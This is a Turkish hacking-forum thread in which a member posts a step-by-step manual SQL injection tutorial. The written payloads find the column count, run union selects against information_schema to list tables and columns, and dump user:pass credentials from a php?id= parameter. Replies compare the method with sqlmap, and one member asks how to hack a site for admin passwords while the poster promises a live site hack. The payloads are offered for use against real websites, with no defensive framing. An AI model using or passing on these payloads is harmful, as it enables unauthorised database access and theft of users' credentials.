>>> MANUEL SQL HACK Videolu Anlatım <<<

Emrullah7

Uzman üye
13 Eki 2015
1,399
0
Selamlar arkadaşlar sizlere buğun SQL hack yötemlerinden Manuel sql hack videolu şekilde anlatmaya çalıştım çekim bana AİT dir umarım beğenirsiniz umarım Yararlı olurum buyun videomuz :
[ame]https://www.youtube.com/watch?v=QSDt1ziTZyY[/ame]

manuel sql :
order+by+1 den başla hata alan kader git
order+by+8 hata aldın ise 7 dir aradığın sayı;
php?id=-1+union+select+0,1,2,3,4,5,6
bunu yaz tablo sayını bul "örngn:3" yansıdı ekrana;
php?id=-1+union+select+0,1,2,group_concat(table_name),4,5,6+from+information_schema.tables
user çıktı karşına siteden char kodunu al ve
php?id=-1+union+select+0,1,2,group_concat(column_name),4,5,6+from+information_schema.columns+where+table_name=char(kodu yapıştır boşluklara virgül at)
user,pass çıktı ;
php?id=-1+union+select+0,1,2,group_concat(user,0x3a,pass),4,5,6+from+user
bu kadarrrr ;D . . .

Saygılarımla Emrullah 7 , , ,

Son düzenleme:

2nokta

Yaşayan Forum Efsanesi
28 Şub 2013
16,689
16
dostum o tarayıcıdaki yer işaretlerinin tht olanları hepsi aynı link mi :D

CrayFt

Katılımcı Üye
25 Ara 2015
768
1
Dostum iyi anlatmışsın ama yazdığın kodları buraya yazarsan daha iyi olur.

TrTorium

Uzman üye
29 Ağu 2015
1,455
0
uid=0(root)
Faydalı Lakin SQL İnjection Manuel'de Çok Fazla Ayrıntı Var Bir Sürü Bypass Yolları + İnjection Çeşidi Olarak Zaman Kaybı Yani SQLMap'ı Etkin Bir Biçimde Kullanmak Daha Önemli :)

Emrullah7

Uzman üye
13 Eki 2015
1,399
0
Faydalı Lakin SQL İnjection Manuel'de Çok Fazla Ayrıntı Var Bir Sürü Bypass Yolları + İnjection Çeşidi Olarak Zaman Kaybı Yani SQLMap'ı Etkin Bir Biçimde Kullanmak Daha Önemli :)
tabi bunlar hepsi hack yöntemi sqlmap sevebilirsin manuel öğrenmekten zarar gelmez diye düşünüyorum saol yinede .)
Dostum iyi anlatmışsın ama yazdığın kodları buraya yazarsan daha iyi olur.

konuya editlendi saol .)

SecretPearl

Katılımcı Üye
7 Tem 2015
829
0
İstanbul
Dostun eline sağlık ta keşke bi site hackleseydin admin şifre falan nasıl alıyorsun öğrenseydik daha iyi olurdu açıkçası fazla anlayamadım keşke devamını getirseydin?

Emrullah7

Uzman üye
13 Eki 2015
1,399
0
Tek Zararı Zaman Kaybı :D Yoksa Zararı Yok; Zaten SQLMap Çok Güçlü Bir İstismar Aracı Gerek Görmüyorum O Yüzden :RpS_thumbup:

zaman kaybı olduğunu düşünmen normal elin bi alışsında göriyim seni bağzı siteler çok bekletir sqlmapta hele havijde 30 dk beklersin tek tek harf harf açılır tablolar ben yasadım hepsi yyani herşey dahil manuel sql ile 5 dk :): ) .))

Emrullah7

Uzman üye
13 Eki 2015
1,399
0
Dostun eline sağlık ta keşke bi site hackleseydin admin şifre falan nasıl alıyorsun öğrenseydik daha iyi olurdu açıkçası fazla anlayamadım keşke devamını getirseydin?

ilk hackleiğim sitede id ve name isimlerini çektim , işte onların yerine user : pass yazıyosun ama yapaarım bi site hacklerim manuelden zamanım olursa saol .))

SecretPearl

Katılımcı Üye
7 Tem 2015
829
0
İstanbul
ilk hackleiğim sitede id ve name isimlerini çektim , işte onların yerine user : pass yazıyosun ama yapaarım bi site hacklerim manuelden zamanım olursa saol .))

Saol üstadım en yakın zamanda yapmanı bekliyorum manuel site hacklemek istiyen herhalde en çok benim ,bunun için benim için çok yararlı ve ilgimi çekti bir an önce öğrenmek isterim programlar uğraştırıyor ama manuel basit inşallah en yakın zamanda videonu beklerim :)

TrTorium

Uzman üye
29 Ağu 2015
1,455
0
uid=0(root)
zaman kaybı olduğunu düşünmen normal elin bi alışsında göriyim seni bağzı siteler çok bekletir sqlmapta hele havijde 30 dk beklersin tek tek harf harf açılır tablolar ben yasadım hepsi yyani herşey dahil manuel sql ile 5 dk :): ) .))

Bazı Siteler İçin %15'inde Felan Diyebilirim Bypass İllaki Yazım Oluyor Ayrıca Blind İnjection;Error Based İnjection,Union Based SQL Injection,Time Based SQL Injection Gibi Türler Var Ben Genel Olarak Konuşuyorum Elinin Alışması Bile Çok Zaman Alır Zaman Kaybı Benden Uzak Dursun Aman :D Yinede Az Çok Tartışmaya Açık Bir Konu :RpS_thumbup:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.